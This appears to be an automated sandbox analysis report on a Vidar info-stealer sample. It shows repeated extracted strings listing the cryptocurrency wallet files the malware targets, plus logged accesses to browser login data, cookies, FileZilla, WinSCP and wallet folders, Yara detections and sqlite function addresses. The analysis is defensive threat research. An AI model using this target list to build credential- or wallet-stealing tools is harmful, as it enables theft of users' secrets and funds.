Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794775836.0000000001627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe	String found in binary or memory: MultiDoge
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4904, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C265C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_1C265C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2D1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C2D1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2CDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	1_2_1C2CDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2F5910 sqlite3_mprintf,sqlite3_bind_int64,	1_2_1C2F5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C37D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_1C37D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2CDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_1C2CDB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C37D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_1C37D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C3714D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	1_2_1C3714D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2F55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C2F55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C32D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C32D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2E9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	1_2_1C2E9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2F51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C2F51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C30D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C30D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C334D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	1_2_1C334D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C280FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	1_2_1C280FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C264820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	1_2_1C264820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2A8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	1_2_1C2A8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C278680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	1_2_1C278680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2A06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	1_2_1C2A06E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2C8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	1_2_1C2C8200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C287810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_1C287810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C27B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	1_2_1C27B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C313770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C313770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C3337E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C3337E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2AEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	1_2_1C2AEF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2CA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	1_2_1C2CA6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2666C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_1C2666C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2BE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	1_2_1C2BE090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2CE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	1_2_1C2CE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_1C2BE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	1_2_1C2BE200

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
